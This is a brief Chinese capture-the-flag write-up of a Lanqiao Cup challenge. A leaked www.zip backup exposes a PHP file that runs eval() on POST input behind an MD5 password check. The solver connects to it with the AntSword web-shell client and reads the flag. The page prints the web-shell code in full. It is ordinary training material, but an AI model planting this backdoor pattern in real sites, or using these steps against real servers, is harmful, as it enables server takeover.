蓝桥杯-网络安全比赛题目-遗漏的压缩包

24 阅读 0 评论 0 点赞

小蓝同学给你发来了他自己开发的网站链接，
他说他故意留下了一个压缩包文件，里面有网站的源代码，
他想考验一下你的网络安全技能。
（点击“下发赛题”后，你将得到一个http链接。如果该链接自动跳转到https，请手动将其改为http再进行访问。）

通过扫描工具扫出该网址下有www.zip文件，下载后查看其中的1337.php

<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
   eval($_POST['1337']);
}

可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’
HACKBOOK
输入密码，通过蚁剑进入SHELL
shell

连接成功
进入根目录，找到flag
flag
flag text
成功夺旗！

本站资源均来自互联网，仅供研究学习，禁止违法使用和商用，产生法律纠纷本站概不负责！如果侵犯了您的权益请与我们联系！

转载请注明出处：免费源码网-免费的源码资源网站 » 蓝桥杯-网络安全比赛题目-遗漏的压缩包

点赞(0) 打赏

本文分类：文章资讯
本文标签：蓝桥杯-网络安全比赛题目-遗漏的压缩包
浏览次数：24 次浏览
本文链接：https://freeymw.com/article/36072.html

上一篇 > Halcon OCR 字体训练
下一篇 > [论文阅读]Enhanced Membership Inference Attacks against Machine Learning Models

评论列表共有 0 条评论

暂无评论

发表评论取消回复

微信公众账号

微信扫一扫加关注

发表
评论返回
顶部